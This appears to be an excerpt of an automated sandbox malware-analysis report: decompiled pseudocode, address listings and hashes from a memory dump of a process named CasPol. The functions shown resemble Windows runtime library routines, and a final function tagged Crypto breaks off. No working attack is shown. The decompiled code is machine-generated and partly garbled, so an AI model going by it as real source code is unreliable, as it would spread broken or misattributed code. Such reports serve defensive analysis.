				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E0163EEF0(0x1717b60);
					_t134 =  *0x1717b84; // 0x77997b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x1717b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x1717b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E01636D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E016376E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E016C8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0162B150();
													}
													_t116 = E016C6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E016375CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x1718638; // 0x0
																	_t122 = L016338A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E016376E2(_t154);
																			goto L41;
																		}
																	} else {
																		E016376E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0165FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L016370F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0165FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0165FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0165FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0165FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0165FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x1717b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x1717b84 = _t75;
						_t73 = E0163EB70(_t134, 0x1717b60);
						if( *0x1717b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E0163FF60( *0x1717b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                                0x0165fab0
                                                                0x0165fab2
                                                                0x0165fab3
                                                                0x0165fab4
                                                                0x0165fabc
                                                                0x0165fac0
                                                                0x0165fb14
                                                                0x0165fb17
                                                                0x0165fac2
                                                                0x0165fac8
                                                                0x0165facd
                                                                0x0165fad3
                                                                0x0165fad3
                                                                0x0165fadd
                                                                0x0165fb18
                                                                0x0165fb1b
                                                                0x0165fb1d
                                                                0x0165fb1e
                                                                0x0165fb1f
                                                                0x0165fb20
                                                                0x0165fb21
                                                                0x0165fb22
                                                                0x0165fb23
                                                                0x0165fb24
                                                                0x0165fb25
                                                                0x0165fb26
                                                                0x0165fb27
                                                                0x0165fb28
                                                                0x0165fb29
                                                                0x0165fb2a
                                                                0x0165fb2b
                                                                0x0165fb2c
                                                                0x0165fb2d
                                                                0x0165fb2e
                                                                0x0165fb2f
                                                                0x0165fb3a
                                                                0x0165fb3b
                                                                0x0165fb3e
                                                                0x0165fb41
                                                                0x0165fb44
                                                                0x0165fb47
                                                                0x0165fb4a
                                                                0x0165fb4d
                                                                0x0165fb53
                                                                0x0169bdcb
                                                                0x0169bdcb
                                                                0x0165fb59
                                                                0x0165fb5b
                                                                0x0165fb5b
                                                                0x0165fb5e
                                                                0x0169bdd5
                                                                0x0169bdd8
                                                                0x00000000
                                                                0x0169bdda
                                                                0x00000000
                                                                0x0169bdda
                                                                0x0165fb64
                                                                0x0165fb64
                                                                0x0165fb64
                                                                0x0165fb67
                                                                0x0165fb6e
                                                                0x0165fb70
                                                                0x0165fb72
                                                                0x00000000
                                                                0x0165fb78
                                                                0x0165fb7a
                                                                0x0165fb7a
                                                                0x0165fb7d
                                                                0x0165fb80
                                                                0x0169bddf
                                                                0x0169bde1
                                                                0x00000000
                                                                0x0169bde3
                                                                0x00000000
                                                                0x0169bde3
                                                                0x0165fb86
                                                                0x0165fb86
                                                                0x0165fb86
                                                                0x0165fb8b
                                                                0x0165fb90
                                                                0x0165fb92
                                                                0x0165fb94
                                                                0x0165fb9a
                                                                0x0165fb9b
                                                                0x0165fba1
                                                                0x0169bde8
                                                                0x0169bdeb
                                                                0x0169bded
                                                                0x0169beb5
                                                                0x0169beb5
                                                                0x0169bebb
                                                                0x0169bebd
                                                                0x0169bec3
                                                                0x0169bed2
                                                                0x0169bedd
                                                                0x0169bedd
                                                                0x0169beed
                                                                0x00000000
                                                                0x0169bdf3
                                                                0x0169bdfe
                                                                0x0169be06
                                                                0x0169be0b
                                                                0x0169be0d
                                                                0x0169be0f
                                                                0x0169be14
                                                                0x0169be19
                                                                0x0169be20
                                                                0x0169be25
                                                                0x0169be27
                                                                0x0169be35
                                                                0x0169be39
                                                                0x0169be46
                                                                0x0169be4f
                                                                0x0169be54
                                                                0x0169be56
                                                                0x0169bef8
                                                                0x0169bef8
                                                                0x00000000
                                                                0x0169be5c
                                                                0x0169be5c
                                                                0x0169be60
                                                                0x00000000
                                                                0x0169be66
                                                                0x0169be66
                                                                0x0169be7f
                                                                0x0169be84
                                                                0x0169be87
                                                                0x0169be89
                                                                0x0169be8b
                                                                0x0169be99
                                                                0x0169be9d
                                                                0x0169bea0
                                                                0x0169beac
                                                                0x0169beaf
                                                                0x0169beb1
                                                                0x0169beb3
                                                                0x0169beb3
                                                                0x00000000
                                                                0x0169bea2
                                                                0x0169bea2
                                                                0x00000000
                                                                0x0169bea2
                                                                0x0169be8d
                                                                0x0169be8d
                                                                0x0169be92
                                                                0x00000000
                                                                0x0169be92
                                                                0x0169be8b
                                                                0x0169be60
                                                                0x0169be3b
                                                                0x0169be3b
                                                                0x0169be3e
                                                                0x00000000
                                                                0x0169be40
                                                                0x0169be40
                                                                0x0169be44
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0169be44
                                                                0x0169be3e
                                                                0x0169be29
                                                                0x0169be29
                                                                0x00000000
                                                                0x0169be29
                                                                0x0169be27
                                                                0x00000000
                                                                0x0165fba7
                                                                0x0165fba7
                                                                0x0165fbab
                                                                0x0169bf02
                                                                0x0165fbb1
                                                                0x0165fbb1
                                                                0x0165fbb8
                                                                0x0165fbbd
                                                                0x0165fbbd
                                                                0x0165fbbf
                                                                0x0165fbbf
                                                                0x0165fbc5
                                                                0x0165fbcb
                                                                0x0165fbf8
                                                                0x0165fbf8
                                                                0x0165fbfa
                                                                0x00000000
                                                                0x0165fc00
                                                                0x0165fc00
                                                                0x0165fc03
                                                                0x00000000
                                                                0x0165fc09
                                                                0x0165fc09
                                                                0x0165fc0f
                                                                0x0165fc15
                                                                0x0165fc23
                                                                0x0165fc23
                                                                0x0165fc25
                                                                0x0165fc27
                                                                0x0165fc75
                                                                0x0165fc7c
                                                                0x0165fc84
                                                                0x00000000
                                                                0x0165fc29
                                                                0x0165fc29
                                                                0x0165fc2d
                                                                0x0165fc30
                                                                0x0169bf0f
                                                                0x00000000
                                                                0x0165fc36
                                                                0x0165fc38
                                                                0x0165fc3b
                                                                0x0165fc41
                                                                0x0169bf17
                                                                0x0169bf19
                                                                0x0169bf48
                                                                0x0169bf4b
                                                                0x00000000
                                                                0x0169bf1b
                                                                0x0169bf22
                                                                0x0169bf24
                                                                0x0169bf26
                                                                0x00000000
                                                                0x0169bf2c
                                                                0x0169bf37
                                                                0x0169bf39
                                                                0x0169bf3b
                                                                0x00000000
                                                                0x0169bf41
                                                                0x0169bf41
                                                                0x0169bf41
                                                                0x0169bf41
                                                                0x0169bf45
                                                                0x00000000
                                                                0x0169bf45
                                                                0x0169bf3b
                                                                0x0169bf26
                                                                0x00000000
                                                                0x0165fc47
                                                                0x0165fc47
                                                                0x0165fc49
                                                                0x0165fcb2
                                                                0x0165fcb4
                                                                0x0165fcb6
                                                                0x0165fcdc
                                                                0x0165fcdc
                                                                0x00000000
                                                                0x0165fcb8
                                                                0x0165fcc3
                                                                0x0165fcc5
                                                                0x0165fcc7
                                                                0x00000000
                                                                0x0165fcc9
                                                                0x0165fcc9
                                                                0x0165fccd
                                                                0x00000000
                                                                0x0165fccd
                                                                0x0165fcc7
                                                                0x00000000
                                                                0x0165fc4b
                                                                0x0165fc4b
                                                                0x0165fc4e
                                                                0x0165fc4e
                                                                0x0165fc51
                                                                0x0165fc51
                                                                0x0165fc54
                                                                0x0165fc5a
                                                                0x0165fc5c
                                                                0x0165fc5f
                                                                0x0165fc61
                                                                0x0165fc63
                                                                0x0165fc65
                                                                0x0165fc67
                                                                0x0165fc6e
                                                                0x0165fc72
                                                                0x0165fc72
                                                                0x0165fc72
                                                                0x0165fc72
                                                                0x0165fc67
                                                                0x0165fc61
                                                                0x00000000
                                                                0x0165fc5a
                                                                0x0165fc49
                                                                0x0165fc41
                                                                0x0165fc30
                                                                0x0165fc27
                                                                0x0165fc03
                                                                0x0165fbcd
                                                                0x0165fbd3
                                                                0x0165fbd9
                                                                0x0165fbdc
                                                                0x0165fbde
                                                                0x0165fc99
                                                                0x0165fc9b
                                                                0x0165fc9d
                                                                0x0165fcd5
                                                                0x0165fcd5
                                                                0x0165fc89
                                                                0x0165fc89
                                                                0x00000000
                                                                0x0165fc9f
                                                                0x0165fc9f
                                                                0x0165fca3
                                                                0x00000000
                                                                0x0165fca3
                                                                0x00000000
                                                                0x0165fbe4
                                                                0x0165fbe4
                                                                0x0165fbe4
                                                                0x0165fbe4
                                                                0x0165fbe9
                                                                0x0165fbf2
                                                                0x00000000
                                                                0x0165fbf2
                                                                0x0165fbde
                                                                0x0165fbcb
                                                                0x0165fbab
                                                                0x0165fc8b
                                                                0x0165fc8b
                                                                0x0165fc8c
                                                                0x0165fb80
                                                                0x0165fb72
                                                                0x0165fb5e
                                                                0x0165fc8d
                                                                0x0165fc91
                                                                0x0165fadf
                                                                0x0165fadf
                                                                0x0165fae1
                                                                0x0165fae4
                                                                0x0165fae7
                                                                0x0165faec
                                                                0x0165faf8
                                                                0x0165fb00
                                                                0x0165fb07
                                                                0x0165fb0f
                                                                0x0165fb0f
                                                                0x0165fb07
                                                                0x00000000
                                                                0x0165faf8
                                                                0x0165fadd

                                                                Strings
                                                                • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0169BE0F
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                • API String ID: 0-865735534
                                                                • Opcode ID: 64732b5f389aba358531cf5125e85502d3179a33c80a88a1d06efc26124f88bd
                                                                • Instruction ID: be721b9357b276afb43cbbaf3af4aefcd44d32d31b1f22ba88705462851701b7
                                                                • Opcode Fuzzy Hash: 64732b5f389aba358531cf5125e85502d3179a33c80a88a1d06efc26124f88bd
                                                                • Instruction Fuzzy Hash: B1A1D372B00606CBEB65DB6CCC50B7AB7AAAF44720F0445BDED46DB791DB34D8428B90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01622D8A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 63%
                                                                			E01622D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x1715350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x1717bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E016697C0();
				}
				if( *0x17179c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x17179c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E01651624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E01647D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E016BFE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E01669520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0165E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0167DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x1716901;
								_push(_t109);
								_v52 = _t98;
								if( *0x1716901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E01669980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E016695D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E01647D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E01647D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E016A7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E016BFDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x1715350;
							if(_t109 != 0x1715350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E016BFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E016B5720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                                0x01622d8a
                                                                0x01622d8a
                                                                0x01622d92
                                                                0x01622d96
                                                                0x01622d9e
                                                                0x01622da0
                                                                0x01622da3
                                                                0x01622da5
                                                                0x01622da8
                                                                0x01622dab
                                                                0x01622db2
                                                                0x0167f9aa
                                                                0x0167f9ab
                                                                0x0167f9ae
                                                                0x0167f9ae
                                                                0x01622db8
                                                                0x01622dc2
                                                                0x0167f9b9
                                                                0x0167f9be
                                                                0x0167f9bf
                                                                0x0167f9bf
                                                                0x01622dcf
                                                                0x0167f9c9
                                                                0x01622dd5
                                                                0x01622dd5
                                                                0x01622dd5
                                                                0x01622dde
                                                                0x01622de1
                                                                0x01622e70
                                                                0x01622e72
                                                                0x01622e72
                                                                0x01622de7
                                                                0x01622deb
                                                                0x01622e7c
                                                                0x01622e83
                                                                0x01622e85
                                                                0x01622e8b
                                                                0x01622e8d
                                                                0x01622e92
                                                                0x01622e92
                                                                0x01622e85
                                                                0x01622df1
                                                                0x01622df7
                                                                0x01622df9
                                                                0x01622df9
                                                                0x01622dfc
                                                                0x01622dff
                                                                0x01622e02
                                                                0x00000000
                                                                0x01622e05
                                                                0x01622e0c
                                                                0x0167f9d9
                                                                0x01622e12
                                                                0x01622e12
                                                                0x01622e12
                                                                0x01622e1a
                                                                0x0167f9e3
                                                                0x0167f9e9
                                                                0x0167f9f0
                                                                0x0167f9f6
                                                                0x0167f9f8
                                                                0x0167f9f8
                                                                0x0167f9f0
                                                                0x01622e23
                                                                0x0167fa02
                                                                0x0167fa03
                                                                0x0167fa05
                                                                0x0167fa06
                                                                0x00000000
                                                                0x01622e29
                                                                0x01622e29
                                                                0x01622e2e
                                                                0x01622e34
                                                                0x01622e3e
                                                                0x00000000
                                                                0x00000000
                                                                0x01622e44
                                                                0x01622e47
                                                                0x01622e4d
                                                                0x00000000
                                                                0x00000000
                                                                0x01622e4f
                                                                0x01622e54
                                                                0x00000000
                                                                0x00000000
                                                                0x01622e5a
                                                                0x01622e5f
                                                                0x01622e9a
                                                                0x01622ea4
                                                                0x01622ea5
                                                                0x01622ea8
                                                                0x01622eaf
                                                                0x01622eb2
                                                                0x01622eb5
                                                                0x0167fae9
                                                                0x0167faeb
                                                                0x0167faed
                                                                0x0167faef
                                                                0x0167faf7
                                                                0x0167faf8
                                                                0x0167fafd
                                                                0x0167faff
                                                                0x0167fb04
                                                                0x0167fb04
                                                                0x0167faff
                                                                0x01622ec0
                                                                0x01622ec4
                                                                0x01622ec6
                                                                0x01622ec8
                                                                0x0167fb14
                                                                0x0167fb18
                                                                0x0167fb1e
                                                                0x0167fb21
                                                                0x0167fb21
                                                                0x01622ece
                                                                0x01622ece
                                                                0x01622ece
                                                                0x01622ed7
                                                                0x01622e61
                                                                0x01622e63
                                                                0x0167fa6b
                                                                0x0167fa71
                                                                0x0167fa76
                                                                0x0167fa78
                                                                0x0167fa8a
                                                                0x0167fa7a
                                                                0x0167fa83
                                                                0x0167fa83
                                                                0x0167fa8f
                                                                0x0167fa91
                                                                0x0167fa97
                                                                0x0167fa9d
                                                                0x0167faa4
                                                                0x0167faaa
                                                                0x0167faaf
                                                                0x0167fab1
                                                                0x0167fac3
                                                                0x0167fab3
                                                                0x0167fabc
                                                                0x0167fabc
                                                                0x0167fac8
                                                                0x0167facb
                                                                0x0167fadf
                                                                0x0167fadf
                                                                0x0167facb
                                                                0x0167faa4
                                                                0x0167fa91
                                                                0x01622e6f
                                                                0x01622e6f
                                                                0x01622e5f
                                                                0x0167fa13
                                                                0x0167fa15
                                                                0x0167fa17
                                                                0x0167fa1f
                                                                0x0167fa21
                                                                0x0167fa22
                                                                0x0167fa25
                                                                0x0167fa28
                                                                0x0167fa2f
                                                                0x0167fa2f
                                                                0x0167fa2a
                                                                0x0167fa2a
                                                                0x0167fa2a
                                                                0x0167fa31
                                                                0x0167fa34
                                                                0x0167fa36
                                                                0x0167fa3c
                                                                0x0167fa3e
                                                                0x0167fa41
                                                                0x0167fa43
                                                                0x0167fa45
                                                                0x0167fa45
                                                                0x0167fa41
                                                                0x0167fa3c
                                                                0x0167fa4a
                                                                0x0167fa4f
                                                                0x0167fa51
                                                                0x0167fa53
                                                                0x0167fa56
                                                                0x0167fa5b
                                                                0x0167fa5e
                                                                0x00000000
                                                                0x0167fa5e
                                                                0x01622e23

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RTL: Re-Waiting
                                                                • API String ID: 0-316354757
                                                                • Opcode ID: f6c31af095f280c9ffb20cdce670076f30d0bf30b61617846559eef37041df4d
                                                                • Instruction ID: 68cbf1464b92325758f6f69cec5b908bc7b86323e456486a8149e8617371c872
                                                                • Opcode Fuzzy Hash: f6c31af095f280c9ffb20cdce670076f30d0bf30b61617846559eef37041df4d
                                                                • Instruction Fuzzy Hash: 62612331A00A15DFEB32EB6CCC90B7EBBA6EB40724F1406ADE961973C1C7349941CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00401798 Relevance: 1.4, Strings: 1, Instructions: 178COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 53%
                                                                			E00401798(void* __eax, void* __esi, intOrPtr _a4, signed int _a8, signed int* _a12) {
				intOrPtr _v8;
				signed int _v12;
				char _v54;
				short _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				signed char _t98;
				signed int _t100;
				signed int _t102;
				signed int _t103;
				void* _t106;
				intOrPtr _t107;
				char _t123;
				signed int _t134;
				intOrPtr _t136;
				signed int _t138;
				signed int _t140;
				void* _t141;
				signed char _t144;
				void* _t145;
				signed char _t148;
				signed int _t151;
				signed char _t153;
				signed char _t155;
				signed int _t157;
				intOrPtr _t159;
				void* _t160;
				void* _t161;
				void* _t162;
				signed int _t165;
				void* _t166;
				signed int* _t168;
				void* _t171;
				void* _t173;
				void* _t174;

				asm("adc edx, [edi]");
				_t98 = __eax + __esi;
				0xec8b();
